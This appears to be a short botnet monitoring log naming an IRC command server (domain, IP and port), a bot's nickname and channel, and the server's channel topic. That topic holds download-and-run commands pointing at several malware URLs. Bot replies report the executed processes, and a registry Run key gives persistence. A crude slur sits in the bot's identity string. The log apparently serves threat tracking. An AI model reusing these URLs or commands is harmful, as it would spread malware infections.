urcdw.zavoddebila.com (botnet hosted in United States Fullerton Staminus Communications)

urcdw.zavoddebila.com DNS_TYPE_A 72.20.14.38
72.20.14.38:33333
Nick: {NOVA}[USA][XP-SP3]610119
Username: VirUs
VirUs “” “lol” :My_Name_iS_PIG_and_Iam_A_GaY
Joined Channel: ##Turb0-XXX##
PRIVMSG #d4 :Done..
PRIVMSG #d2 :Done..
Channel Topic for Channel ##Turb0-XXX##: “!NAZELturbo http://thenaturemedia.in/install.48691.exe ifasfa264.exe | !NAZELturbo http://7arhive.com/setup585.exe afasfa4.exe | !NAZELturbo http://img103.herosh.com/2011/02/09/666929080.gif fsaf24.exe | !NAZELturbo http://img104.herosh.com/2011/02/08/547715969.gif micro1.exe”
Private Message to Channel ##Turb0-XXX##: “Executed process “fsaf24.exe”.”
Private Message to Channel ##Turb0-XXX##: “Download failed!”
Private Message to Channel ##Turb0-XXX##: “Executed process “afasfa4.exe”.”
Private Message to Channel
Private Message to Channel ##Turb0-XXX##: “Executed process “micro1.exe”.”
Process Created:
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\services.exe
Registry Modified:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ info
MS Service Manager C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\services.exe

Hosting information:
http://whois.domaintools.com/72.20.14.38
